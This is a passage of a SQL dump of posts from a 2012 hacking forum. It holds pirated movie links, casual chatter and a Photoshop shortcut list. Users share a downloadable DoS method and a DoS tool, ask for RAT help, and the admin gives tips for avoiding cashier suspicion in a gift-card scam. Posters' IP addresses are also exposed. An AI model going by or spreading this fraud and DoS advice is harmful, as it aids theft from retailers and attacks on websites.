'[img]http://content8.flixster.com/movie/11/16/69/11166934_det.jpg[/img]\r\n\r\n[b]Genre:[/b] Horror , Mystery\r\n[b]Release:[/b] 12 October 2012\r\n[b]Length:[/b] 110 min \r\n[b]Rate:[/b] 71%\r\n[b]Description[/b]: Found footage helps a true-crime author realize how and why a family was murdered in his new home, though his discoveries put his entire family in the path of a supernatural entity.\r\n\r\n[b]Links[/b]\r\n\r\nSkylo: http://skylo.me/rc.php?Id=aa0df4a35184f6ae24fbb050d7df7e4d\r\n\r\nFleon: http://fleon.me/rc.php?Id=5fd9f878fff648328f96fef12e90f0b9\r\n\r\nHQvideo: http://hqvideo.cc/pc/21bdfd851cd1b11c/', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '39f991ba3a7dc327c3756063ee40cb6b', '0', '0'); INSERT INTO mybb_posts VALUES('7065', '997', '5646', '14', 'RE: Discovery Channel - Track Me If You Can 2010', '0', '9', 'p420', '1352186259', 'I watched it a year ago. Forgot some stuff but it\'s a nice video.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '936dc48f5eda5228a062fd921d11e8f7', '0', '0'); INSERT INTO mybb_posts VALUES('7066', '1183', '6956', '46', 'RE: [TUT] Getting Images from index', '0', '9', 'p420', '1352186345', 'Can we just find the path of the image and append the path on the url of the site?', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'bfb5d6118487b2bb5ea6bcfe9c421bf2', '0', '0'); INSERT INTO mybb_posts VALUES('7067', '177', '587', '12', 'RE: [tut]How to get the FBI login screen', '0', '67', 'HoverCatz', '1352188865', 'Do i need to restart my pc? It came up straight away', '193.161.89.204', '-1046390324', '1', '0', '0', '0', '1', 'b3374e912bf9478b2aa23d0dfd31677d', '0', '0'); INSERT INTO mybb_posts VALUES('7068', '951', '5363', '71', 'RE: L33thacking Minecraft Server', '0', '67', 'HoverCatz', '1352189085', 'I can make required plugins, for the Dev rank.', '193.161.89.204', '-1046390324', '1', '0', '67', '1352189203', '1', '8e4e5afcf107daa0826ebb347c2e2f80', '0', '1352189203'); INSERT INTO mybb_posts VALUES('7069', '1190', '7004', '3', 'RE: New Rule', '0', '222', 'Exposé', '1352189855', 'Yeh this is a very good rule. That way it decreases people stealing shit from LH....', '74.67.7.114', '1245906802', '1', '0', '0', '0', '1', '424e7e1de09c7451ac3a731b46722185', '0', '0'); INSERT INTO mybb_posts VALUES('7070', '1196', '7048', '7', 'RE: Your favorite time of the year?', '0', '62', 'R?????zo?', '1352191916', 'Well my favourite time in the year is December (Yeah I know it\'s a month) but that\'s me and my gf\'s birthday with X-mas and New Year, it\'s just a full month partying :)', '188.140.116.210', '-1131645742', '1', '0', '0', '0', '1', '3b99c13de1c77429ca10dad40b36fb75', '0', '0'); INSERT INTO mybb_posts VALUES('7071', '1202', '0', '34', '???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '62', 'R?????zo?', '1352193031', '[font=Impact][align=center][size=xx-large]PHOTOSHOP KEYBOARD SHORTCUTS FOR SELECTIONS[/size][/align][/font]\n\n[size=medium][align=center]Ctrl+A selects everything on the screen.\nCtrl+D deselects everything on the screen.\nCtrl+Click on a Layers icon to select the contents of a layer\nCtrl+Shift+I Inverts a selection\nCtrl + Alt/Option + A Selects all layers\nCtrl + Alt/Option + R Brings up Refine Edge menu[/align][/size]\n\n[font=Impact][size=xx-large][align=center][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR LAYERS[/align][/align][/size][/font]\n\n[size=medium][align=center]Ctrl + Shift + N creates a new layer\nCtrl + J makes a duplicate of the current layer or selection.\nCtrl + Shift + J Makes a new layer via cut\nCtrl + E Merges the current layer with the one below\nCtrl + Shift + E merges all visible layers\nCtrl + Shift + Alt/Option + E merges all visible layers into a new composite Layer\nCtrl + ] Brings layer up/forward one layer\nCtrl + [ Sends layer down/back one layer\nCtrl + Shift + ] Brings layer to the top/front\nCtrl + Shift + [ Sends layer to the bottom/back\nCtrl + G groups layers together\nCtrl + Shift + G Ungroups layers.\nAlt/Option-click on the eye icon of a layer to hide all other layers than this one.\nAlt/Option -click between 2 layers to create a clipping mask between the 2 layers.\n\n[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR TOOLS[/align][/size][/font]\n\n[size=medium][align=center]V - The Move Tool\nM?-?The Marquee Tool\nW?-?The Magic Wand/Quick Selection Tool\nL - The Lasso Tool\nB?-?The Brush Tool\nI?-?The Eyedropper Tool\nJ - The Spot Healing Brush\nC?-?The Crop Tool\nG - The Gradient Tool\nY - The History Brush\nS - The Clone Stamp Tool\nZ - The Zoom Tool\nA - The Path Selection Tool\nE?-?The Eraser Tool\nU - The Custom Shape Tool\nP?-?The Pen Tool\nO - The Dodge Tool\nT?-?The Type Tool\nH - The Hand Tool\nR - The Rotate ToolHold shift + hit any key multiple times- Cycles through the sub tools under the main tool. Example: Shift + G switches from the gradient tool to the Paint Bucket tool. Hit it again, and it will switch to the 3D Material Drop Tool.[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR BRUSHES[/align][/size][/font]\n\n[size=medium][align=center][ - makes a brush become larger.\n] – makes a brush become smaller.\n1-9 – lowers the opacity of the brush to a percentage. Example: 1=10%.\nCtrl + Alt/Option + Dragging up or down adjusts the hardness of your brush.\nCtrl + Alt/Option + Dragging left or right adjusts the size of your brush[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR TYPE[/align][/size][/font]\n\n[size=medium][align=center]Double-click the T icon in a text layer to select all of the text on a layer.\nWith text selected, select the font name in the options bar and Use + and – to cycle through each font, enabling you to preview your type in each font choice.\nCtrl + Alt/Option + Shift + < – Decreases selected text by 10pt\nCtrl + Alt/Option + Shift + > – Increases selected text by 10pt\nCtr + Shift + C centers selected type\nCtr + Shift + B Makes selected type bold\nCtr + Shift + I Makes selected type italic\nCtr + Shift + L Aligns selected text to the left\nCtr + Shift + R Aligns selected text to the right\nCtr + Shift + U Underlines Selected text\nCtr + Shift + H Makes selected text small caps\nCtr + Shift + K Makes selected text all caps[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR ADJUSTMENTS[/align][/size][/font]\n\n[size=medium][align=center]Ctrl+L Brings up the Levels Adjustment\nCtrl+M Brings up the Curves Adjustment\nCtrl+U Brings up the Hue/Saturation Adjustment\nCtrl+B Brings up the Color Balance Adjustment\nCtrl+Shift + Alt/Option + B Brings up the Black & White Adjustment\nCtrl+Shift + U Desaturates your image\n[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR VIEWING[/align][/size][/font]\n\n[size=medium][align=center]Ctrl+ - makes you zoom out of a photo.\nCtrl+ + makes you zoom in on a photo.\nCtrl+ 0 makes your document fit on the screen.\nCtrl+R shows and hides your rulers.\nCtrl+I inverts the current image, layer, or selection.\nCtrl + Alt/Option + I brings up the dialog box for image size and resolution.\nCtrl + Alt/Option + C brings up the dialog box for canvas size.\n[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR FILLS[/align][/size][/font]\n\n[size=medium][align=center]Alt/Option + delete fills a layer with the current foreground color.\nCtrl + delete fills a layer with the current background color.\nShift + delete Brings up a fill dialog box with different options.\n1-9 determines the percentage of opacity for a layer. Example: 1 = 10%.\nAlt + 1-9 determines the percentage of fill for a layer. Example: 1 = 10%.[/align][/size]\n\n[font=Impact][size=xx-large][align=center]PHOTOSHOP KEYBOARD SHORTCUTS FOR SAVING[/align][/size][/font]\n\n[size=medium][align=center]Ctrl + S Saves the current document.\nCtrl + Shift + S Saves as a new document of your choice.\nCtrl + Alt/Option + Shift + S brings up the Save for Web dialog box.[/align][/size]\n\n[font=Impact][size=xx-large][align=center]OTHER PHOTOSHOP KEYBOARD SHORTCUTS[/align][/size][/font]\n\n[size=medium][align=center]Ctrl + F repeats the last filter that you used.\nHitting the D key resets your Foreground and Background color to black & White.\nHitting the X Key will switch your Foreground and Background colors.\nAlt/Option-Click on a layer mask icon allows you to view the black & white mask.\nHold shift and tap the “+” key repeatedly to cycle down the different blend modes\nHold shift and tap the “-” key repeatedly to cycle up the different blend modes\nHit the Space Bar to switch to the Hand Tool to move around your document. Release the Space Bar to switch back to the tool you were using before.\nCtrl + T Transforms the currently selected layer(s).[/align][/size]\n\ncredits: Rin™', '188.140.116.210', '-1131645742', '1', '0', '62', '1352193063', '1', 'fa5c8bf6c2fa63e608380a0832ab944e', '0', '1352193063'); INSERT INTO mybb_posts VALUES('7072', '1164', '6985', '11', 'RE: RAT Help', '0', '5', 'Timmy', '1352193793', '[quote=\'MinecraftGeek\' pid=\'6985\' dateline=\'1351971030\']\r\nTrying to RAT Deetz are you Jacob?\r\n[/quote]\r\n\r\nWho the heck is Deetz?', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '0be4aabab5433c9a8b324247ba8bad46', '0', '0'); INSERT INTO mybb_posts VALUES('7073', '1203', '0', '21', 'Jok3r Manual DoSing sites method', '0', '5', 'Timmy', '1352195123', 'This method can be used to hit small and medium sites even if they are using Cloudflare it shouldn\'t be a problem. Please Please Please leech this ebook and Yes I AM asking because the most this ebook goes around the better it would be for L33T Hacking.\r\n\r\n[lock]Download: http://www.mediafire.com/view/?pf897pk545v7rvp[/lock]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '354295496d5260ddbc4b990c4598bc7b', '0', '0'); INSERT INTO mybb_posts VALUES('7074', '1181', '6946', '7', 'RE: Who wants Jok3rs private DDoSing method', '0', '5', 'Timmy', '1352195245', 'http://l33thacking.net/thread-1203-lastpost.html\n\nEnjoy!', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '991d626f33ded43c99c512ced1713baf', '0', '0'); INSERT INTO mybb_posts VALUES('7075', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '7', 'Romdu62', '1352195357', '0/10 because he doesnt like catz', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '29daf93cda13f9affc741972b59cd526', '0', '0'); INSERT INTO mybb_posts VALUES('7076', '253', '1106', '56', 'RE: Count to 200', '0', '7', 'Romdu62', '1352195403', '57. Today, 02:45 AM\n\nA time for something :P', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c877fc25bfa52756e04d38b9b214a7be', '0', '0'); INSERT INTO mybb_posts VALUES('7077', '487', '2354', '56', 'RE: Corrupt a wish', '0', '7', 'Romdu62', '1352195442', 'no idea what breshie is talking about. i wish i was a scientisit', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'fefeda9e9bd352f68ef40f557a5e8561', '0', '0'); INSERT INTO mybb_posts VALUES('7078', '238', '1021', '56', 'RE: Ban the user above you', '0', '7', 'Romdu62', '1352195474', 'Banned for aving adsense traffic.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'c2575ace55a75de7fedc6b905dd68cb1', '0', '0'); INSERT INTO mybb_posts VALUES('7079', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '7', 'Romdu62', '1352195504', 'I hoope i win. Good luck myself', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '58e7081dd56a4d7f8987612ef002a4b8', '0', '0'); INSERT INTO mybb_posts VALUES('7080', '197', '696', '56', 'RE: /me Thread', '0', '7', 'Romdu62', '1352195536', '/me is jealous ipod is talking to t3h jok3r', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', 'f4dde5835f21ccbffd3a149834cb7758', '0', '0'); INSERT INTO mybb_posts VALUES('7081', '1165', '6820', '7', 'RE: I m Back on LH:)', '0', '7', 'Romdu62', '1352195571', 'Dont know u but welcome back', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '2831946fcb364e4943832b2efca7f7b0', '0', '0'); INSERT INTO mybb_posts VALUES('7082', '1177', '7025', '43', 'RE: Free itunes/app store gift cards crack', '0', '7', 'Romdu62', '1352195697', '[quote=\'iTzIpod\' pid=\'7025\' dateline=\'1352039038\']\r\nDidn\'t know about this but oh well. Can t3h jok3r confirm of this?\r\n[/quote]\r\n\r\nThis works. i checked it.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '89dd1612414085840ecab0f1bbeac506', '0', '0'); INSERT INTO mybb_posts VALUES('7083', '1120', '6778', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '7', 'Romdu62', '1352195743', '[quote=\'iTzIpod\' pid=\'6778\' dateline=\'1351715254\']\r\nYeah and the OP said that it\'s premium though too.\r\nIt\'s not.\r\nIt just allows you to call people in a group chat and share screen in a group chat with 2 or more people.\r\nSkype Premium allows you to call people and text people via SMS. But this doesn\'t allow it.\r\n[/quote]\r\n\r\nit allows calls in my country i dont know about urs.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '89d94319e55716e140b7ee3128173658', '0', '0'); INSERT INTO mybb_posts VALUES('7084', '1204', '0', '3', 'We are L33T', '0', '1', 't3h jok3r', '1352195855', 'Our first section to reach 1337 posts :D\r\n\r\nIsn\'t this such a great milestone achieved?\r\n\r\n[attachment=7]', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'f278b6d354bbfb2a83a3a5c1e0f61ba8', '0', '0'); INSERT INTO mybb_posts VALUES('7085', '1173', '6846', '5', 'RE: Request for LH staff', '0', '1', 't3h jok3r', '1352195911', 'Thanks it\'s going to help our Alexa rank :D', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '8d4e0d023ed3207b82572dffcb7429ef', '0', '0'); INSERT INTO mybb_posts VALUES('7086', '1177', '7025', '43', 'RE: Free itunes/app store gift cards crack', '0', '1', 't3h jok3r', '1352196031', '[quote=\'iTzIpod\' pid=\'7025\' dateline=\'1352039038\']\r\nDidn\'t know about this but oh well. Can t3h jok3r confirm of this?\r\n[/quote]\r\n\r\nConfirmed it works but you have to be able to act in front of the cashier if you are acting weird or something the cashier might suspect something and be careful while scratching. If the cashier finds out that the card is scratched then it\'s either they will send you to get another one or they will question you.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', 'ab325e78464be4bd244a2c94b2311865', '0', '0'); INSERT INTO mybb_posts VALUES('7087', '1205', '0', '43', 'Barcodes Truth', '0', '8', 'spacefish36', '1352196194', 'I found out yesterday that the barcodes on the products are the same, I mean the barcodes of the same product are the same. EX: If you buy two trojan condoms, same flavor etc the barcodes would be the same. I believe all the same flavor trojan condoms barcodes in the store are the same.', '72.231.24.165', '1223104677', '0', '0', '0', '0', '1', '06df2fee42d84e0056b73cd050303f1a', '0', '0'); INSERT INTO mybb_posts VALUES('7088', '1206', '0', '35', 'Sexy Girls Cool Wallpapers 1920 X 1200', '0', '62', 'R?????zo?', '1352199201', 'Not sure if this is the right section, just wanted to share with you guys some wallpapers that my friend recently sent me.\n\nPreview: [img]http://s19.postimage.org/f32dbpelv/40_Sexy_Girls_Cool_Wallpapers_1920_X_1200_Set_3.jpg[/img]\n\n[lock]\nPart 1 - https://www.rapidshare.com/files/4149331322/40_Sexy_Girls_Cool_Wallpapers_1920_X_1200__Set_3_.rar\nPart 2 - http://www.mediafire.com/?dqh1071ns5sskyx\n[/lock]\n\nEnjoy :)', '188.140.116.210', '-1131645742', '1', '0', '62', '1352199260', '1', '803175a8a888c3151ae94118cda643a0', '0', '1352199260'); INSERT INTO mybb_posts VALUES('7089', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '53', 'sirchamp', '1352200927', 'Finally you have posted it :D\nBeen awaiting this for ages.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '96ef3527716f90bdecb3290ccdcc449d', '0', '0'); INSERT INTO mybb_posts VALUES('7090', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '53', 'sirchamp', '1352201000', 'Already had this. Its a very good Doser', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '0dc83fe143d46a6f547cdf5c2139e2d6', '0', '0'); INSERT INTO mybb_posts VALUES('7091', '1204', '7084', '3', 'RE: We are L33T', '0', '205', 'mothered', '1352203699', 'Yes, that\'s quite an achievement.\r\n\r\nI feel like not posting there, so as not to ruin It. Joking :)', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '4bb4dcadb3099bf537f578dcaa364e53', '0', '0'); INSERT INTO mybb_posts VALUES('7092', '1194', '7042', '4', 'RE: moruzaks in the building', '0', '82', 'iTzIpod', '1352206697', 'Welcome to LH bro!\nEnjoy your stay and be active!', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'aebdf4f7719bca359eac07d1912197f6', '0', '0'); INSERT INTO mybb_posts VALUES('7093', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '82', 'iTzIpod', '1352206750', 'You\'re a new member and you\'re doing a giveaway already? Even without making a Introduction thread?\nBadass alert.\nI would like one ;p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '991dc089d78e08dd25e373b9784e5185', '0', '0'); INSERT INTO mybb_posts VALUES('7094', '1197', '7050', '4', 'RE: Perfection', '0', '82', 'iTzIpod', '1352206782', 'Welcome to L33tHacking. Enjoy your stay! :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '0113ccd247adca5ff0302e661bd9ed18', '0', '0'); INSERT INTO mybb_posts VALUES('7095', '595', '2869', '65', 'RE: What movie did you watch recently?', '0', '82', 'iTzIpod', '1352206978', 'I saw Skyfall! :o Very nice movie <3', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '94aa444152f482dfdea6fe260a71d3b5', '0', '0'); INSERT INTO mybb_posts VALUES('7096', '1196', '7048', '7', 'RE: Your favorite time of the year?', '0', '82', 'iTzIpod', '1352207035', 'New Years, or, Summer Vacation. :D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '69e85c738f15fae0a19ab76fbbfa2d08', '0', '0'); INSERT INTO mybb_posts VALUES('7097', '1091', '6338', '56', 'RE: Rate the avatar above you', '0', '82', 'iTzIpod', '1352207095', '0/0 because you have no avatar. ._. And also, you shouldn\'t be judging on a member who doesn\'t like cats or not.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '8b9460c32d4b1ac2b4a456082a78a1eb', '0', '0'); INSERT INTO mybb_posts VALUES('7098', '253', '1106', '56', 'RE: Count to 200', '0', '82', 'iTzIpod', '1352207136', '58.\n/me is le shit.', '24.212.197.164', '416597412', '1', '0', '82', '1352207144', '1', '3136be79a431189fe5d0154ca98d841f', '0', '1352207144'); INSERT INTO mybb_posts VALUES('7099', '487', '2354', '56', 'RE: Corrupt a wish', '0', '82', 'iTzIpod', '1352207209', 'Granted but you died from an explosion during an experiment test.\n\nI wish I had 500+ rep', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7b81feaf26f9aeae10b365a84a8b1497', '0', '0'); INSERT INTO mybb_posts VALUES('7100', '238', '1021', '56', 'RE: Ban the user above you', '0', '82', 'iTzIpod', '1352207240', 'Banned for not having an avatar', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '983eb88f30a006436957edd0302b2d48', '0', '0'); INSERT INTO mybb_posts VALUES('7101', '249', '1057', '56', 'RE: Last person to reply, wins!', '0', '82', 'iTzIpod', '1352207272', 'Dude. I won. Chill guys.. ._.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '4a5a9d649fa9ec44b44be7b04108d937', '0', '0'); INSERT INTO mybb_posts VALUES('7102', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352207312', '/me is happy that Romdu62 is jealous of me and t3h jok3r\'s [s]friendship[/s] relationship.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '780ceacd6815b994416062bed65246e1', '0', '0'); INSERT INTO mybb_posts VALUES('7103', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1352207346', 'Oh okay. It only allows Group Video calling.\nAlso, they ran out of codes.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'bfc960d8d8849a3f24082540cbe2fa89', '0', '0'); INSERT INTO mybb_posts VALUES('7104', '1204', '7084', '3', 'RE: We are L33T', '0', '82', 'iTzIpod', '1352207388', 'Congratulations L33tHacking.\n:D', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'ffde2b883f3198132d0bc6ef7d93a7c1', '0', '0'); INSERT INTO mybb_posts VALUES('7105', '197', '696', '56', 'RE: /me Thread', '0', '53', 'sirchamp', '1352209568', '/me is sad because he should be learning latin and french instead of sitting in front of the computer.', '7.170.71.237', '128600045', '1', '0', '0', '0', '1', '927a2377c631d0c986897ca1808ef7f6', '0', '0'); INSERT INTO mybb_posts VALUES('7106', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '67', 'HoverCatz', '1352210021', 'Edit your post Purps please.\nDo [ lock]ACCOUNTS HERE[/ lock] (without space in the []) to only make the accounts visible to users who have posted.', '199.167.132.161', '-945322847', '1', '0', '67', '1352210110', '1', '1ab2e6a139404bbf37d4a691f01c6df2', '0', '1352210110'); INSERT INTO mybb_posts VALUES('7107', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '67', 'HoverCatz', '1352211633', 'haha :P', '199.167.132.161', '-945322847', '1', '0', '0', '0', '1', 'b34ec2e6051f1327af34c1727e485767', '0', '0'); INSERT INTO mybb_posts VALUES('7108', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '258', 'PiXEL^OG', '1352212180', 'Looks like some fun :D Thanks for the share!!', '139.190.235.246', '-1950422026', '0', '0', '0', '0', '1', 'd2cd20dce96547b9809d7afdad5b9178', '0', '0'); INSERT INTO mybb_posts VALUES('7109', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '62', 'R?????zo?', '1352215249', 'Haha no problem :)\nEnjoy mate.', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', '44a88aea76b0383c7092076e30b906ec', '0', '0'); INSERT INTO mybb_posts VALUES('7110', '1204', '7084', '3', 'RE: We are L33T', '0', '62', 'R?????zo?', '1352215290', 'Lol nice, gratz 1337hacking :PP', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', '72f6cba8a59b7f5356f606b7f4b3ecd2', '0', '0'); INSERT INTO mybb_posts VALUES('7111', '1195', '7106', '47', 'RE: Premium Minecraft Accounts', '0', '324', 'Purps™', '1352215290', '[quote=\'HoverCatz\' pid=\'7106\' dateline=\'1352210021\']\r\nEdit your post Purps please.\r\nDo [ lock]ACCOUNTS HERE[/ lock] (without space in the []) to only make the accounts visible to users who have posted.\r\n[/quote]\r\n\r\nI am sending them via message. =)', '67.181.154.90', '1135975002', '0', '0', '0', '0', '1', '77d2fe7bb71c4134d4cfe7308c510451', '0', '0'); INSERT INTO mybb_posts VALUES('7112', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '62', 'R?????zo?', '1352215488', 'Looks great, thanks :)\nDownloading.', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', 'c1d15f0213e7b534c62b4b014e0d65d4', '0', '0'); INSERT INTO mybb_posts VALUES('7113', '1190', '7004', '3', 'RE: New Rule', '0', '62', 'R?????zo?', '1352216450', 'Any way to remove the \"[lock]\" tags after the user have posted, it seems like the tags keep being there even though we post, this is not annoying but should be easy to fix, just a minor bug', '188.140.36.102', '-1131666330', '1', '0', '0', '0', '1', 'c60c49c93d73ca8b68782ecbe5c92931', '0', '0'); INSERT INTO mybb_posts VALUES('7114', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '160', 'Jacob', '1352221048', 'Well, you have to post to get it, so here it is, lets see if it works.', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '16069ab2bddd978bf37bf74b8ad33dd0', '0', '0'); INSERT INTO mybb_posts VALUES('7115', '48', '125', '21', 'RE: [Strong] Anonymous DoSer _z0r0_in C #', '0', '160', 'Jacob', '1352221355', 'Yep, going to try this out, thank you,', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '44cfff89c4af3dfeb1aec7a82da7a50b', '0', '0'); INSERT INTO mybb_posts VALUES('7116', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '62', 'R?????zo?', '1352223720', 'Been waiting for this !\nI\'m just curious how it works :P', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '3d969fb70d6b92099a88bd9786c814f1', '0', '0'); INSERT INTO mybb_posts VALUES('7117', '1197', '7050', '4', 'RE: Perfection', '0', '62', 'R?????zo?', '1352224561', 'welcome to l33t hacking, stay active and HQ :)', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c94b9d5f671e850d1b00dc5e5d3e4f77', '0', '0'); INSERT INTO mybb_posts VALUES('7118', '1164', '6811', '11', 'RE: RAT Help', '0', '160', 'Jacob', '1352227755', 'Timmy, so can you add me on skype?: J.acob.C', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '5e83d8a1194b9e55d60a450569cdff20', '0', '0'); INSERT INTO mybb_posts VALUES('7119', '1197', '7050', '4', 'RE: Perfection', '0', '228', 'VirtualLegend', '1352230298', 'Sup Welcome to L33thacking\n\nRules: http://l33thacking.net/misc.php?action=help&hid=8', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', 'b5997b0af4a3d71515243bee72c78509', '0', '0'); INSERT INTO mybb_posts VALUES('7120', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '228', 'VirtualLegend', '1352230420', 'I Want to join this giveaway, need a MC account :D', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '796b166cb382dba3fbccb116f4af457c', '0', '0'); INSERT INTO mybb_posts VALUES('7121', '1206', '7088', '35', 'RE: Sexy Girls Cool Wallpapers 1920 X 1200', '0', '228', 'VirtualLegend', '1352230494', 'The First one is HOT !!!!!', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '0f912390822f28c90d2420522997f4eb', '0', '0'); INSERT INTO mybb_posts VALUES('7122', '1202', '7071', '34', 'RE: ???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '228', 'VirtualLegend', '1352230545', 'Thanks Reload, Now i can work 10 times faster', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '760c1b3dd6e3a9fc1320dd1367c186a0', '0', '0'); INSERT INTO mybb_posts VALUES('7123', '951', '7068', '71', 'RE: L33thacking Minecraft Server', '0', '228', 'VirtualLegend', '1352230628', '[quote=\'HoverCatz\' pid=\'7068\' dateline=\'1352189085\']\r\nI can make required plugins, for the Dev rank.\r\n[/quote]\r\n\r\nOkay if everyone has time we will work on it', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '04c0539724725d08a47aaa44ce8ac737', '0', '0'); INSERT INTO mybb_posts VALUES('7124', '1168', '6828', '73', 'RE: Temple Run or Subway Surfer?', '0', '228', 'VirtualLegend', '1352230724', 'Temple Run 4 Live :P\n\nMy Highscore; 8.456732 (Without using the Wings)', '83.83.167.183', '1397991351', '0', '0', '0', '0', '1', '9dd1cd26357fdec3d5d4337989e2bc4f', '0', '0'); INSERT INTO mybb_posts VALUES('7125', '1202', '7071', '34', 'RE: ???FULL???Basic Photoshop Keyboard Shortcuts ???LIST???', '0', '2', 'Apathy', '1352236038', 'Saw this on hf already but nice share.', '173.206.130.71', '-1378975161', '0', '0', '0', '0', '1', 'ab8eed6d4196466c1cd66661b796eba1', '0', '0'); INSERT INTO mybb_posts VALUES('7126', '1204', '7084', '3', 'RE: We are L33T', '0', '2', 'Apathy', '1352236143', 'Pretty awesome achievement. Good job guys.', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', '773ba8d9199c56af3f60b4aba0d2f81b', '0', '0'); INSERT INTO mybb_posts VALUES('7127', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '2', 'Apathy', '1352236232', 'Damn I was to late for this...', '173.206.129.3', '-1378975485', '0', '0', '0', '0', '1', '3cb12380a0cf0221b072b231ffb52a0f', '0', '0'); INSERT INTO mybb_posts VALUES('7128', '1120', '6523', '19', 'RE: HOW TO GET UNLIMITED SKYPE PREMIUM', '0', '82', 'iTzIpod', '1352236416', '/Request Close Thread.\nMethod no longer works :/', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '059481243ae6109213fb78101e11b4fb', '0', '0'); INSERT INTO mybb_posts VALUES('7129', '197', '696', '56', 'RE: /me Thread', '0', '82', 'iTzIpod', '1352236453', '/me is also sad because he should be doing his homework but gets distracted too easily.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '108de1d54e5df1ec76718c132d8d410d', '0', '0'); INSERT INTO mybb_posts VALUES('7130', '1203', '7073', '21', 'RE: Jok3r Manual DoSing sites method', '0', '82', 'iTzIpod', '1352236487', 'I hope it\'s worth posting! :p\nThanks for the share.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'e4fcc6af8a33df7c676c87be27d7394b', '0', '0'); INSERT INTO mybb_posts VALUES('7131', '1195', '7045', '47', 'RE: Premium Minecraft Accounts', '0', '82', 'iTzIpod', '1352236739', 'You haven\'t PMed me yet :p', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '475b7b03473c33f4db09c32c232a4cdb', '0', '0'); INSERT INTO mybb_posts VALUES('7132', '1204', '7084', '3', 'RE: We are L33T', '0', '160', 'Jacob', '1352238599', 'Yep, this is pretty awesome. I contributed like 20 of them :D', '142.255.31.241', '-1895882767', '1', '0', '0', '0', '1', '09beb762d43a280b10ec4e267090da80', '0', '0'); INSERT INTO mybb_posts VALUES('7133', '1207', '0', '35', 'Rate these logos', '0', '82', 'iTzIpod', '1352242352', 